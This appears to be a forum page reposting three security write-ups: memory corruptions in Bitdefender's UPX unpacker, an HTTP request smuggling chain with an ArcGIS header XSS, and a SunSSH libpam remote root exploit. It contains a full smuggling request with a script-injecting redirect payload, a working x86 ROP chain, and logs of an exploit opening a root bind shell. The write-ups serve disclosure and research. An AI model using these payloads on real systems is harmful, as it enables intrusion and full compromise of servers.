deobfuscation run we always XOR with the same byte. We would simply XOR as follows: First run (i=0): XOR with B0 B0 B0 B0 B0 B0 B0 Second run (i=1): XOR with B1 B1 B1 B1 B1 Third run (i=2): XOR with B2 B2 Overall, we then have XORed with C0 C0 C1 C1 C1 C2 C2 for completely arbitrary C0, C1, and C2. We can essentially XOR with such a pattern of almost arbitrary length, and switch the byte at most 0x300 times. Needless to say, this vulnerability is a useful exploitation primitive as it enables very powerful memory corruptions: XORing allows us to modify selectively only certain parts of data, leaving other parts (for example heap metadata or critical objects) untouched. //4//: Heap Buffer Overflow in the Filters A filter is a simple transformation on binary code (say, x86-64 code) that is applied before compression, with the goal to make the code more compressible. After we have decompressed the data, we need to revert this filtering. Bitdefender supports about 15 different filters. Here is one of them (filter 0x11): int32_t bytes_to_filter = /* omitted. is guaranteed not to be oob. */; int i = 0; while (1) { do { if (--bytes_to_filter < 0) break; } while (extracted_data[i++] != 0xE8u); if (bytes_to_filter < 0) break; *(int32_t *)&extracted_data[i] -= i; // <-- oob write i += 4; } The problem is that bytes_to_filter is only updated when i is incremented by one, but not when it is later incremented by four. Of the 15 filters, about 8 seem to be affected by such a heap buffer overflow. I treated them all together as one bug (after all, it is not unlikely that they share code). //5//: Heap Buffer Overflow when Rebuilding Imports The following memory corruption occurs in a loop of the function PeFile::rebuildImports (cf. PeFile::rebuildImports). It looks like this: this->im->iat = this->iatoffs; this->newiat = &extract_obj->extracted_data[this->iatoffs - (uint64_t)(uint32_t)pefile->rvamin]; while (*p) { if (*p == 1) { ilen = strlen(++p) + 1; if (this->inamespos) { if (ptr_diff(this->importednames,this->importednames_start) & 1) --this->importednames; memcpy(this->importednames + 2, p, ilen); // <-- memory corruption *this->newiat = ptr_diff(this->importednames,extract_obj->extracted_data - pefile->rvamin); this->importednames += ilen + 2; p += ilen; } else { //omitted, see below //5// } } else if (*p == 0xFFu) { p += 3; *this->newiat = ord_mask + *(uint16_t *)(p + 1); } else { // omitted } ++this->newiat; } The length ilen that is passed to memcpy is completely attacker-controlled and thus needs to be checked. Observe that the original UPX does a checked omemcpy at this place. //6//: Another Heap Buffer Overflow when Rebuilding Imports In the same loop of the function PeFile::rebuildImports (cf. PeFile::rebuildImports), there is another memory corruption: this->im->iat = this->iatoffs; this->newiat = &extract_obj->extracted_data[this->iatoffs - (uint64_t)(uint32_t)pefile->rvamin]; while (*p) { if (*p == 1) { ilen = strlen(++p) + 1; if (this->inamespos) { //omitted, see above //5// } else { extracted_data = extract_obj->extracted_data; dst_ptr = (extracted_data - pefile->rvamin) + (*this->newiat + 2); if (dst_ptr < extracted_data) return 0; extracted_data_end = &extracted_data[extract_obj->extractbuffer_bytes_written]; if (dst_ptr > extracted_data_end || &dst_ptr[ilen + 1] > extracted_data_end) return 0; strcpy(dst_ptr,p); // <-- memory corruption p += ilen; } } else if (*p == 0xFFu) { p += 3; *this->newiat = ord_mask + *(uint16_t *)(p + 1); } else { // omitted } ++this->newiat; } The problem is that the strings dst_ptr and p can overlap, so we overwrite the string that we called strlen() on earlier. This can turn a terminating null-byte into a non-null byte and when strcpy() is called, the string is longer than expected, overflowing the buffer. A possible fix is to replace the strcpy(dst_ptr,p) with memmove(dst_ptr,p,ilen). It looks like original UPX is affected as well. The two commits 14992260 and 1faaba8f are an attempt to fix the problem in the devel branch of UPX. //7//: Heap Buffer Overflow when Unoptimizing the Relocation Table Another memory corruption is in the function Packer::unoptimizeReloc (cf. Packer::unoptimizeReloc😞 for (uint8_t * p = *in; *p; p++, relocn++) { if (*p >= 0xF0u) { if (*p == 0xF0u && !*(uint16_t *)(p + 1)) { p += 4; } p += 2; } } uint32_t * outp = (uint32_t *)malloc(4*relocn + 4); if (!outp) return -1; uint32_t * relocs = outp; int32_t jc = -4; for (uint8_t * p = *in; *p; p++) { if (*p >= 0xF0u) { uint32_t dif = *(uint16_t *)(p + 1) + ((*p & 0xF) * 0x10000); p += 2; if (dif == 0) { dif = *(int32_t *)(p + 1); p += 4; } jc += dif; } else { jc += *p; } *relocs = jc; // <-- oob write ++relocs; if (!packer->extracted_data) return -1; if (bits == 32) { if (jc > packer->extractbuffer_bytes_written - 4) return -1; uint32_t tmp = *(uint32_t*)&extracted_data[jc]; packer->extracted_data[jc + 0] = (uint8_t)(tmp >> 24); packer->extracted_data[jc + 1] = (uint8_t)(tmp >> 16); packer->extracted_data[jc + 2] = (uint8_t)(tmp >> 8); packer->extracted_data[jc + 3] = (uint8_t)tmp; } else { // omitted } } Ignoring the if-branch if (bits == 32), this looks fine. The very first loop runs through the table until a null byte is encountered and relocn counts how many entries there are. Then, a buffer of size 4 * relocn + 4 is allocated, and we run through the table a second time. The problem is that in the branch if (bits == 32), the endianness of a 4-byte value is swapped, and since the offset jc can point to the position where the null byte was, this can turn a null byte into a non-null byte. If that happens, it is easy to see that in the second loop, the variable p is increased further than in the first loop, and thus the allocated buffer is too small. The write *reloc = jc is then eventually out of bounds. It looks like the original UPX is affected as well. Commit e03310fc is an attempt to fix the bug in the devel branch of UPX. //8//: Heap Buffer Overflow when Finishing Building the Relocation Table The next memory corruption is to be found in the function PeFile::reloc::finish (cf. PeFile::reloc::finish😞 *(uint32_t *)&start[4 * counts[0] + 1024] = this->endmarker; qsort(start + 1024, ++counts[0], 4i64, le32_compare); rel = (reloc *)start; rel1 = (uint16_t *)start; for (ic = 0 ; ic < counts[0]; ++ic) { unsigned pos = *(int32_t *)&start[4 * ic + 1024]; if ((pos ^ this->prev) >= 0x10000) { rel1 = rel1; this->prev = pos; *rel1 = 0; rel->size = ALIGN_UP(ptr_diff(rel1,rel), 4); //rel1 increased by up to 3 bytes next_rel = (reloc *)((char *)rel + rel->size); rel = next_rel; rel1 = (uint16_t *)&next_rel[1];// rel1 increased by sizeof(reloc)==8 bytes next_rel->pagestart = (pos >> 4) & ~0xFFF; } *rel1 = ((int16_t)pos << 12) + ((pos >> 4) & 0xFFF); // <-- oob write ++rel1; } It seems that without the inner if-branch, the bound check ic < counts[0] would be fine, since it is then guaranteed that rel1 is before the position that the index 4*ic+1024 represents. However, if we go into the if-branch, rel1 is increased faster than one would expect. On top of the 2-byte increase at the end of every loop iteration, the if-branch may increase rel1 by 3 bytes (due to the ALIGN_UP(_,4)) and by another sizeof(reloc) == 8 bytes. It seems like the original UPX is affected as well. Looking at the original code, we see that rel and rel1 are advanced in a call to the function PeFile::reloc::newRelocPos which was inlined in the above (decompiled) code snippet. Interestingly, it is this inlining that makes the bug easy to spot. The UPX developers have been notified about this on September 20, but no patch is available yet. //9//: Heap Buffer Overflow when Building the Export Table It looks like the engine is not really fully reconstructing the export table, but only doing some basic virtual address adjustments (compare to the original PeFile::Export::build😞 uint32_t num_entries = export_dir_buffer[6]; // attacker-controlled uint32_t va_dif = export_dir_virtualaddress - outer_export_dir_virtualaddress; uint32_t table_base_offset = export_dir_buffer[8] - outer_export_dir_virtualaddress; export_dir_buffer[3] += va_dif; export_dir_buffer[7] += va_dif; export_dir_buffer[8] += va_dif; export_dir_buffer[9] += va_dif; for(uint32_t i=0; i<num_entries; i++) { if ((table_base_offset + 4*i > export_dir_buffer_size) || (table_base_offset + 4*i < export_dir_buffer_size)) // <-- what? goto LABEL_ERROR; *(uint32_t*)((uint8_t*)export_dir_buffer + table_base_offset + 4*i) += va_dif; // <-- oob write } The bound check on table_base_offset + 4*i looks very suspicious. It is probably a typing error. Even ignoring memory safety, it is unlikely that this comes close to implementing the desired functionality: the loop can execute at most one iteration, and in this one iteration we have table_base_offset + 4*i == export_dir_buffer_size, which is guaranteed to cause a memory corruption (an attacker-controlled 4-byte integer is written out of bound). The fixed check looks as follows. if ((table_base_offset + 4*i >= export_dir_buffer_size) || (table_base_offset + 4*i + 3 >= export_dir_buffer_size)) goto LABEL_ERROR; It is likely that this bug was introduced due the original check being added via a bound checking macro of UPX in a wrong way. //10//: Heap Buffer Overflow when Rebuilding Resources Finally, there is a memory corruption at the very end of PeFile::rebuildResource (cf. PeFile::rebuildResource), where the constructed resources are written back: if (!*(int32_t *)(&extracted_data[*((int32_t *)pefile->extracted_ntheader + 34) - pefile->rvamin + 12])) { result = memcpy(&extracted_data[*((uint32_t*)pefile->extracted_ntheader + 34) - (uint64_t)(uint32_t)pefile->rvamin], p, res.dirsize()); } There is no bound check on res.dirsize(). Note that the original UPX-code has a checked omemcpy. Conclusion Virtually all main steps of Bitdefender’s UPX unpacker were affected by a critical memory corruption vulnerability. Interestingly, the actual decompression is perhaps the only step that seems to be unaffected. This is because the engine is extracting into a dynamically-sized buffer (similar to an std::vector) via an API that does not even allow memory corruptions (the only operations used are append_byte(b) and append_bytes(buf,len)). In almost half of the presented cases, the critical bound check was simply missing. In most the other cases, the bound check was obviously wrong. Perhaps the only memory corruptions that are not completely obvious are //6// and //7//, as they are caused by unexpected overlaps. It seems that //6//, //7//, and //8// have been inherited from the original UPX code. The UPX developers have been notified about this and are in the process of fixing the bugs. Since the original UPX is clearly not made to unpack untrusted binaries (such as malware) and does not run at a high level of privileges, these bugs are not that critical there. However, in the context of an anti-virus engine these bugs become dangerous vulnerabilities. Bitdefender’s engine is running unsandboxed as NT\AUTHORITY SYSTEM and is scanning untrusted files fully automatically, making it an attractive target for remote code execution exploits. An actual exploit would have to bypass ASLR and DEP (and possibly the stack canary). The previous exploit on F-Secure Anti-Virus shows that this is not that difficult, even in a non-scriptable environment. The outlined vulnerabilities are part of Bitdefender’s core engine that is not only used by many of their own anti-virus products on various operating systems (macOS, Linux, FreeBSD, Windows), but is also licensed to numerous other anti-virus vendors. Vulnerabilities in the core engine are therefore immediately affecting numerous users and devices. Do you have any comments, feedback, doubts, or complaints? I would love to hear them. You can find my e-mail address on the about page. Timeline of Disclosure The following timeline looks somewhat scrambled, because the bugs were not discovered in the natural control-flow order that is used for the presentation in this blog post. 2020-07-03 - Discovery of //5// 2020-07-08 - //5// has been patched (the Bitdefender team found the bug before I could report it) 2020-07-15 - Discovery and report of //7// 2020-07-16 - Discovery and report of //9// 2020-07-20 - Bitdefender rolls out patches for //7// and //9// 2020-07-28 - Bitdefender reserved CVE-2020-15729 for //7// 2020-08-09 - Discovery and report of //4// 2020-08-09 - Discovery and report of //6// 2020-08-09 - Discovery and report of //8// 2020-08-12 - Bitdefender has rolled out patches for //4//, //6//, and //8// 2020-08-14 - Bitdefender communicates that they are “planning to stop allocating CVEs automatically for each and every single vuln[erability]” (emphasis in original). 2020-08-15 - Discovery and report of //3// 2020-08-16 - Discovery and report of //1// 2020-08-17 - Bitdefender rolls out patches for //1// and //3// 2020-08-30 - Discovery and report of //10// 2020-09-02 - Bitdefender rolls out patch for //10// 2020-09-04 - The patch for //8// is incomplete, even the same file can be used to trigger a crash. Asking for a full patch. Response: “that particular issue will be fixed via update probably on Monday, next week”. 2020-09-07 - Bitdefender rolls out second patch for //8// 2020-09-07 - The patch for //3// is incomplete, asking for a complete patch for //3// 2020-09-08 - Bitdefender: “Can you give us more details regarding this bug [//3//]? Can you still reproduce this vulnerability?” I describe the problem again and send a new file triggering the bug (since the original one did not trigger it anymore) 2020-09-08 - The second patch for //8// is still incomplete. Submitting a new file to trigger the bug 2020-09-10 - Bitdefender rolls out second patch for //3// and third patch for //8// 2020-09-17 - Discovery and report of //2// (without a PoC file) 2020-09-20 - Reached out to UPX developers, describing //6//, //7//, and //8// 2020-09-21 - Bitdefender rolls out first patch for //2// 2020-09-30 - The third patch for //3// is still incomplete. Submitting a new file to trigger the bug 2020-09-30 - The first patch for //2// is still incomplete. Submitting a more detailed problem description 2020-09-30 - Bitdefender rolls out second patch for //2// 2020-10-05 - Bitdefender rolls out fourth patch for //3// 2020-10-31 - The second patch for //2// checks against an initialized value, but introduces an integer underflow (causing a fully attacker-controlled heap buffer overflow). Submitting a file to trigger the new bug 2020-11-02 - Bitdefender rolls out third patch for //2// Bug bounties were paid for all submissions (including follow-up submissions pointing out incomplete patches). Thanks & Acknowledgements I want to thank the Bitdefender team for fixing all reported bugs. In addition, I want to thank Alex Balan, Octavian Guzu, and Marius Gherghinoiu for providing me with regular status updates. Sursa: https://landave.io/2020/11/bitdefender-upx-unpacking-featuring-ten-memory-corruptions/
  7. Smuggling an (Un)exploitable XSSPermalink This is the story about how I’ve chained a seemingly uninteresting request smuggling vulnerability with an even more uninteresting header-based XSS to redirect network-internal web site users without any user interaction to arbitrary pages. This post also introduces a 0day in ArcGis Enterprise Server. However, this post is not about how request smuggling works. If you’re new to this topic, have a look at the amazing research published by James Kettle, who goes into detail about the concepts. Smuggling Requests for Different Response LengthsPermalink So what I usually do when having a look at a single application is trying to identify endpoints that are likely to be proxied across the infrastructure - endpoints that are commonly proxied are for example API endpoints since those are usually infrastructurally separated from any front-end stuff. While hunting on a private HackerOne program, I’ve found an asset exposing an API endpoint that was actually vulnerable to a CL.TE-based request smuggling by using a payload like the following: POST /redacted HTTP/1.1 Content-Type: application/json Content-Length: 132 Host: redacted.com Connection: keep-alive User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 Foo: bar Transfer-Encoding: chunked 4d {"GeraetInfoId":"61e358b9-a2e8-4662-ab5f-56234a19a1b8","AppVersion":"2.2.40"} 0 GET / HTTP/1.1 Host: redacted.com X: X As you can see here, I’m smuggling a simple GET request against the root path of the webserver on the same vhost. So in theory, if the request is successfully smuggled, we’d see the root page as a response instead of the originally queried API endpoint. To verify that, I’ve spun up a TurboIntruder instance using a configuration that issues the payload a hundred times: While TuroboIntruder was running, I’ve manually refreshed the page a couple of times to trigger (simulate) the vulnerability. Interestingly, the attack seemed to work quite well, since there were actually two different response sizes, whereof one was returning the original response of the API: And the other returned the start page: This confirms the request smuggling vulnerability against myself. Pretty cool so far, but self-exploitation isn’t that much fun. Poisoning Links Through ArcGis’ X-Forwarded-Url-Base HeaderPermalink To extend my attack surface for the smuggling issue, I’ve noticed that the same server was also running an instance of the ArcGis Enterprise Server under another directory. So I’ve reviewed its source code for vulnerabilities that I could use to improve the request smuggling vulnerability. I’ve stumbled upon an interesting constellation affecting its generic error handling: The ArcGIS error handler accepts a customized HTTP header called X-Forwarded-Url-Base that is used for the base of all links on the error page, but only if it is combined with another customized HTTP header called X-Forwarded-Request-Context. The value supplied to X-Forwarded-Request-Context doesn’t really matter as long as it is set. So a minified request to exploit this issue against the ArcGis’ /rest/directories route looks like the following: GET /rest/directories HTTP/1.1 Host: redacted.com X-Forwarded-Url-Base: https://www.rce.wf/cat.html? X-Forwarded-Request-Context: HackerOne This simply poisons all links on the error page with a reference to my server at https://www.rce.wf/cat.html? (note the appended ? which is used to get rid off the automatically appended URL string /rest/services😞 While this already looks like a good candidate to be chained with the smuggling, it still requires user interaction by having the user (victim) to click on any link on the error page. However, I was actually looking for something that does not require any user interaction. A Seemingly Unexploitable ArcGis XSSPermalink You’ve probably guessed it already. The very same header combination as previously shown is also vulnerable to a reflected XSS. Using a payload like the following for the X-Forwarded-Url-Base: X-Forwarded-Url-Base: https://www.rce.wf/cat.html?"><script>alert(1)</script> X-Forwarded-Request-Context: HackerOne leads to an alert being injected into the error page: Now, a header-based XSS is usually not exploitable on its own, but it becomes easily exploitable when chained with a request smuggling vulnerability because the attacker is able to fully control the request. While popping alert boxes on victims that are visiting the vulnerable server is funny, I was looking for a way to maximize my impact to claim a critical bounty. The solution: redirection. If you’d now use a payload like the following: X-Forwarded-Url-Base: https://www.rce.wf/cat.html?"><script>document.location='https://www.rce.wf/cat.html';</script> X-Forwarded-Request-Context: HackerOne …you’d now be able to redirect users. Connecting the DotsPermalink The full exploit looked like the following: POST /redacted HTTP/1.1 Content-Type: application/json Content-Length: 278 Host: redacted.com Connection: keep-alive User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 Foo: bar Transfer-Encoding: chunked 4d {"GeraetInfoId":"61e358b9-a2e8-4662-ab5f-56234a19a1b8","AppVersion":"2.2.40"} 0 GET /redacted/rest/directories HTTP/1.1 Host: redacted.com X-Forwarded-Url-Base: https://www.rce.wf/cat.html?"><script>document.location='https://www.rce.wf/cat.html';</script> X-Forwarded-Request-Context: HackerOne X: X While executing this attack at around 1000 requests per second, I was able to actually see some interesting hits on my server: After doing some lookups I was able to confirm that those hits were indeed originating from the program’s internal network. Mission Completed. Thanks for the nice critical bounty Sursa: https://www.rcesecurity.com/2020/11/Smuggling-an-un-exploitable-xss/
      • 1
      • Like
  8. Exploiting Solaris 10 -11.0 SunSSH via libpam on x86 13.11.2020 by HackerHouse A recently disclosed vulnerability CVE-2020-14871 impacting Solaris-based distributions has been actively used in attacks against SunSSHD for over 6 years. The vulnerability was identified being exploited in the wild by an APT threat actor[0] then disclosed by FireEye after being detected during an attack. The issue is also referenced as CVE-2020-27678 by the Illumos project which similarly contained the vulnerable code making this issue impact a dozen additional Solaris-based distributions. This vulnerability is noteworthy as a number of separate individuals and groups identified this flaw after it was learned to have been circulating by exploit brokers since 6th October 2014. The issue first came to light during the HackingTeam breach incident, as emails showed that a private exploit broker firm “Vulnerabilities Brokerage International” emailed the company announcing they had a SunSSHD exploit for sale for a monthly license fee. An email snippet from the breach announcing the sale is shown below, and the attached product portfolio[1] gives sufficient information that allowed Hacker House to confirm this is the same flaw disclosed recently as the one sold since 2014. According to FireEye this issue was sold for $3,000 on an underground forum to the detected APT group, however quotes for this issue may have ranged anywhere from $25-$50,000 over the years prior to it’s disclosure. “14-006 is a new memory corruption vulnerability in Oracle Solaris SunSSHD yielding remote privileged command execution as the root user. The provided exploit is a modified OpenSSH client making exploitation of this vulnerability very convenient.” This blog post discusses Hacker House efforts to develop an exploit for the now publicly known flaw and how we exploited this issue against Solaris x86 targets. The vulnerability is also present on SPARC systems with exploits existing in the wild that support both architectures. The actual flaw exists within the core “Pluggable authentication module” library which can be reached remotely over SunSSH only when “keyboard-interactive” is enabled. This configuration is the default on a generic install of Solaris requiring no configuration changes to be exploitable, making this a critical issue (CVSS 10.0) that remotely impacts the OS out of the box. Let’s look at the vulnerability specifics first, by reviewing the parse_user_name() function within “pam_framework.c”. The code snippet below is taken prior to the patch applied to Illumos[2] (a fork of Solaris using an open-source base which also contained the vulnerable code). I have removed comments from this snippet for the purposes of brevity in this blog. 621 static int 622 parse_user_name(char *user_input, char **ret_username) 623 { 624 register char *ptr; 625 register int index = 0; 626 char username[PAM_MAX_RESP_SIZE]; 629 *ret_username = NULL; 635 bzero((void *)username, PAM_MAX_RESP_SIZE); 636 640 ptr = user_input; 641 643 while ((*ptr == ' ') || (*ptr == '\t')) 644 ptr++; 645 646 if (*ptr == '\0') { 651 return (PAM_BUF_ERR); 652 } 653 658 while (*ptr != '\0') { 659 if ((*ptr == ' ') || (*ptr == '\t')) 660 break; 661 else { 662 username[index] = *ptr; 663 index++; 664 ptr++; 665 } 666 } 667 669 if ((*ret_username = malloc(index + 1)) == NULL) 670 return (PAM_BUF_ERR); 671 (void) strcpy(*ret_username, username); 672 return (PAM_SUCCESS); 673 } The “username” buffer is a 512 byte array, defined by PAM_MAX_RESP_SIZE (from pam_appl.h) which is declared on the stack at the start of the function. This buffer is used to hold the username supplied to the parse_user_name() function when authentication via PAM is performed. The “user_input” argument supplied to this function is processed in a while loop beginning on line 658, this loop will skip over any whitespace or tab characters identified and on line 662 will write each byte of the user_input argument into the fixed-size username buffer. The vulnerability exists because this function does not check for the bounds of the username stack array, and thus it is possible to write past the boundary of the buffer by supplying a user_input argument to this function with a length greater than 512 bytes. This is a classic example of “stack-smashing” and allows the attacker to corrupt the stack frame, overwriting important variables such as pointers used as return addresses by the currently executing function. Now we have learned the vulnerability specifics, we can identify ways to trigger the issue by looking for code using the parse_user_name() function. When using SunSSH with “keyboard-interactive” authentication enabled in the configuration (a standard default unless changed), SunSSH will make use of the “authtok_get” PAM module to prompt for a username and password. The PAM module will use pam_sm_authenticate() using the supplied username, which calls pam_get_user() and ultimately provides our username into the parse_user_name() function directly. The “keyboard-interactive” configuration option in SunSSH has been available since Solaris 9, however versions of SunSSH that shipped with Solaris 9 did not actually implement “keyboard-interactive” making this issue only applicable via SunSSH to Solaris 10 and 11. Further to this, since 11.1 changes to the Solaris code base still contained the vulnerability, however, usernames are now truncated before reaching the vulnerable code path preventing the overflow from occurring via SunSSH. To trigger the PAM authentication prompts, we can simply supply a blank or empty username over SSH and pass a username greater than 512 bytes, causing the stack frame to be corrupted and the remote SunSSH process to core dump on the target. An example of triggering this issue using the standard OpenSSH client is shown below. % ssh -l "" 192.168.11.120 Please enter user name: brrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr Connection closed by 192.168.11.120 port 22 We will now demonstrate how to exploit this issue on a vulnerable Solaris 10 host using latest available Solaris 10 install media[3] which does not include the fix. We added several package utilities such as “gdb” onto our host to assist with exploitation, additionally you may find that enabling “debug” for PAM modules by editing the “other” modules settings in /etc/pam.conf will help identify the issue within syslog. On a default install, core dumps are not enabled in any meaningful way and you should enable them using “coreadm” if you want to review core files. We will trigger the vulnerability by sending 512 bytes and an additional 8 bytes which will be overwritten on the stack. We used libssh2 to create our SSH connections to our target and send the characters to the username prompt which will be used in the overflow. You could also use Python’s paramiko, other SSH libraries or write a patch for the OpenSSH client to achieve the same goal. Program received signal SIGSEGV, Segmentation fault. 0x42424242 in ?? () (gdb) i r $eip $ebp eip 0x42424242 0x42424242 ebp 0x41414141 0x41414141 As can be seen, the variables directly after the username buffer on the stack include the base pointer and instruction pointer (although slightly different on Solaris 11, the EIP is still overwritten) making this a trivial to exploit vulnerability on x86. SPARC systems require additional work to obtain control of the program counter as the crash occurs during a memory write operation. Additionally, if we supply more characters into the overflow we notice that the program will crash in an earlier function, as we corrupt the stack frame and overwrite a pointer used in a memory write operation before returning into our return address. Program received signal SIGSEGV, Segmentation fault. 0xfee91c01 in ?? () (gdb) x/i $eip => 0xfee91c01: mov %eax,(%ecx) (gdb) i r $ecx ecx 0x72727272 1920103026 Our exploit must ensure that we handle this issue by supplying an address that can be written before we return into our shellcode (16 bytes into the overflow on 10) to prevent the application crashing. We can review the process memory address space using the “info proc mappings” command in gdb, shortened here for brevity, which allows us to check the mapped addresses and their protections. Mapped address spaces: Start Addr End Addr Size Offset Flags 0x8041000 0x8047fff 0x7000 0xffffa000 -s--rw- 0x8050000 0x8098fff 0x49000 0 ----r-x 0x80a9000 0x80abfff 0x3000 0x49000 ----rw- 0x80ac000 0x80cdfff 0x22000 0 --b-rw- On Solaris 10 x86 the stack is mapped at 0x8041000 with a size of 0x7000 bytes (0x08040000 and 0x8000 bytes on Solaris 11) without the executable flag. ASLR is not enabled for userspace applications on vulnerable versions of Solaris (it was only introduced in Solaris 11.1) which means our stack is always located at the same address and subsequently so too is our username buffer. We can pack our shellcode into the username buffer but we must first enable the executable flag on the stack. We can use the mprotect() system call to remap the stack page as executable before we execute any code placed here. We use a technique known as return oriented programming (ROP) which builds gadgets that make use of the “ret” instruction and our supplied stack frame to programmatically execute instructions through a chain of returning functions. This technique will allow us to execute code which we will use to call the mprotect() function. We can identify which library files are mapped to which address using the “pmap” command and then use utilities such as ROPgadget[4] to search mapped binaries for instructions to use followed by a “ret” instruction. On Solaris, the mprotect syscall number is 0x74 and the interrupt service routine used by syscalls is 0x91. Our ROPchain should then perform instructions similar to the following which can be tested using gdb. movl $0x74,%eax // mprotect syscall pushl $0x7 // PROT_READ | PROT_WRITE | PROT_EXEC pushl $0x7000 // size pushl $0x08041000 // pointer to page to map pushl $0x0 // unused int $0x91 // execute the system call By searching through library files and the process binary we can build a ROPchain that calls mprotect and execute it via the “sysenter” function. We can then return into the stack where our shellcode is stored on an executable page and run arbitrary payloads. The mprotect system call on Solaris will accept lengths and protection variables that are somewhat incorrect providing they loosely match the needed values (prot LSB must be 0x07 and len MSB must 0x08 & below), the function will return an error in such instances but the memory pages protections will still have been changed. We can check how our system call is being executed using the “truss” utility to trace the sshd process once we supply our ROP chain. We also used a helper function to remap the stack in situations when only part of the stack page could be mapped using the variables available in the process memory, although this is not essential in many cases. The mprotect function still requires the address to be page aligned which means we must ensure that we do not use a NULL byte when supplying variables such as 0x08043000 to the system call. An example ROP chain for Solaris 10 is shown here. We make use of variables already found within the program to call the mprotect() function, we write our stack address into this buffer and then enable the execution protections on the stack. The chain will then return into the stack buffer where our supplied shellcode is ready to be executed. "\xa3\x6c\xd8\xfe" // mov $0x74, %eax ; ret "\x29\x28\x07\x08" // pop %ebx ; ret "\xf0\xff\xaf\xfe" // unused gadget, passed to prevent %ecx crashing "\x08\xba\x05\x08" // pop %edx ; pop %ebp ; ret "\x01\x30\x04\x08" // %edx pointer to page "\xb8\x31\x04\x08" // unused %ebp value "\xaa\x4c\x68\xfe" // pop %ecx ; ret "\xe0\x6e\x04\x08" // ptr (0x?,0x0,0x1000,0x7) "\x61\x22\x07\x08" // dec %edx ; ret "\x8b\x2d\xfe\xfe" // mov %edx,0x4(%ecx) ; xor %eax,%eax ; ret "\xa3\x6c\xd8\xfe" // mov $0x74, %eax ; ret "\x08\xba\x05\x08" // pop %edx ; pop %ebp ; ret "\xc3\x31\x04\x08" // shellcode addr for %edx "\xc3\x31\x04\x08" // unused %ebp value "\xf6\x0d\xf4\xfe" // sysenter, (ret into shellcode via %edx) You can download an exploit for this issue from our github[5], at the time of writing we include ROP chains for multiple versions of Solaris 10 through 11.0 on x86. As an example shellcode we have used bind shell payloads generated with “msfvenom” that can be used on Solaris 10 targets, however on Solaris 11.0 the execve() system call has changed to execvex() which needs additional arguments and there are no public shellcodes that will work directly on 11.0 targets. To solve this issue, we have also included an example execve() shellcode for such systems for demonstration purposes (which may change in the future). As we continue to research this issue and its exploitability on different architectures and Operating Systems (such as SmartOS, OpenIndiana, OmniOS & other Illumos based distributions), we will likely continue to update our exploit, check our github for the latest available version. It is strongly advised that both “password” and “keyboard-interactive” methods of authentication are disabled on impacted SSH services. As this vulnerability exists in the core PAM framework, it is highly likely other exploitable scenarios exist other than via SSH services and it is strongly advised that a fix is applied as a matter of priority to any impacted hosts. Solaris systems are typically used in mission critical environments and utilizing Shodan[6], we can see that potentially 3,200 hosts on network perimeters maybe impacted by this flaw. As Solaris is frequently used within internal networks the actual number of vulnerable systems is believed to be much higher and Hacker House advises that all system owners address this issue as a matter of priority. Impacted hosts should also be reviewed to identify core files and syslog entries which may indicate the presence of a previously performed attack as the issue has known to be exploited in the wild for at least 6 years and your systems may already have been compromised. An example of our exploit being used in a successful attack can be seen here. $ ./hfsunsshdx -s 192.168.11.120 -t 2 -x 1 [+] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871 [-] chosen target 'Solaris 10 1/13 (147148-26) Sun_SSH_1.1.5 x86' [-] using shellcode 'Solaris x86 bindshell tcp port 8080' 196 bytes [+] ssh host fingerprint: e4e0f371515d0d0be6767b0c628e1b8891f18d1f [+] entering keyboard-interactive authentication. [-] number of prompts: 1 [-] prompt 0 from server: 'Please enter user name: ' [-] shellcode length 196 bytes [-] rop chain length 64 [-] exploit buffer length 576 [-] sending exploit magic buffer... wait [+] exploit success, handling payload... [-] connected.. enjoy SunOS unknown 5.10 Generic_147148-26 i86pc i386 i86pc 12:20pm up 1 day(s), 18:40, 1 user, load average: 0.03, 0.03, 0.03 helpdesk pts/2 Nov 13 10:27 (unknown) uid=0(root) gid=0(root) References [0] Live off the Land? How About Bringing Your Own Island? An Overview of UNC1945 [1] Assets Portfolio Update: 2014-10-06 attachment “Assets_Portfolio.pdf.zip” [2] Vulnerable “pam_framework.c [3] sol-10-u11-ga-x86-dvd.iso download [4] ROPgadget tool [5] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871 [6] Shodan SunSSH search Sursa: 